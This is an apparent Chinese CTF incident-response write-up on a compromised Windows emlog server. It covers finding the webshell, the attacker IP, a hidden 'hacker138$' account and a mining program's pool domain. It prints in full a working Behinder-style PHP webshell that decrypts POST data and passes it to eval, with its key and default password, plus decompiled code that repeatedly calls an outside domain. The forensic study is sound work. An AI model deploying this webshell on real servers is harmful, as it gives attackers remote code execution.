第四章 windows实战-emlog

rdp连接

1.通过本地 PC RDP到服务器并且找到黑客植入 shell,将黑客植入 shell 的密码 作为 FLAG 提交;

找到目录

然后全部文件爬下来放到d盾里面扫描

然后扫到了一个后门文件

复制代码
<?php
@error_reporting(0);
session_start();
    $key="e45e329feb5d925b"; //该密钥为连接密码32位md5值的前16位,默认连接密码rebeyond
	$_SESSION['k']=$key;
	session_write_close();
	$post=file_get_contents("php://input");
	if(!extension_loaded('openssl'))
	{
		$t="base64_"."decode";
		$post=$t($post."");
		
		for($i=0;$i<strlen($post);$i++) {
    			 $post[$i] = $post[$i]^$key[$i+1&15]; 
    			}
	}
	else
	{
		$post=openssl_decrypt($post, "AES128", $key);
	}
    $arr=explode('|',$post);
    $func=$arr[0];
    $params=$arr[1];
	class C{public function __invoke($p) {eval($p."");}}
    @call_user_func(new C(),$params);
?>

2.通过本地 PC RDP到服务器并且分析黑客攻击成功的 IP 为多少,将黑客 IP 作为 FLAG 提交;

我们找到小皮里面的关于阿帕奇的日志记录路径

然后搜索 shell.php

然后猜测192.168.126.1是其中黑客尝试爆破的一个ip

flag{192.168.126.1}

3.通过本地 PC RDP到服务器并且分析黑客的隐藏账户名称,将黑客隐藏账户名称作为 FLAG 提交;

隐藏账户一般是影子账户,所以直接命令秒了

复制代码
C:\Users\Administrator>wmic useraccount get Name
Name
Administrator
DefaultAccount
Guest
hacker138$
WDAGUtilityAccount

提交的时候要删去$

flag{hacker138}

4.通过本地 PC RDP到服务器并且分析黑客的挖矿程序的矿池域名,将黑客挖矿程序的矿池域名称作为(仅域名)FLAG 提交;

进入该账户内进行查看是否有相关的信息

发现有一个应用程序,看起来很大还是py打包的,而且中文名为矿

直接开始解包

然后得到pyc源码

用uncompyle6进行反编译pyc源码

复制代码
import multiprocessing, requests

def cpu_intensive_task():
    while True:
        try:
            requests.get('http://wakuang.zhigongshanfang.top', timeout=10)
        except:
            pass


if __name__ == '__main__':
    cpu_count = multiprocessing.cpu_count()
    processes = [multiprocessing.Process(target=cpu_intensive_task) for _ in range(cpu_count)]
    for process in processes:
        process.start()
    else:
        for process in processes:
            process.join()

显而易见 其中的矿池地址是

http://wakuang.zhigongshanfang.top

前面的域名也显而易见是挖矿

flag{wakuang.zhigongshanfang.top}

相关推荐
梓羽玩Python4 小时前
AiPy 你的AI打工牛马来了!真正的开源Agent神器!
人工智能·python·github
该用户已不存在4 小时前
Windows 开发环境这么难配,为什么还有那么多人在用?
前端·windows·后端
徐小夕6 小时前
开源了一款基于 Vue 3 的高性能多维表格编辑器
前端·vue.js·github
水饺编程7 小时前
Windows 命令行:cd 命令1,cd 命令的简单使用
c语言·c++·windows·visual studio
水饺编程7 小时前
Windows 命令行:父目录与子目录
c语言·c++·windows·visual studio
暴躁的小胡!!!8 小时前
2026届长亭科技秋招正式开始
网络·安全·web安全
Johny_Zhao9 小时前
达梦数据库高可用集群部署方案
linux·mysql·网络安全·docker·信息安全·kubernetes·云计算·shell·containerd·达梦数据库·yum源·系统运维·centos8
大米粥哥哥9 小时前
Qt libcurl的下载、配置及简单测试 (windows环境)
开发语言·c++·windows·qt·http·curl·libcurl
Whoami!9 小时前
⸢ 叁 ⸥ ⤳ 默认安全:概述与建设思路
网络安全·信息安全·安全架构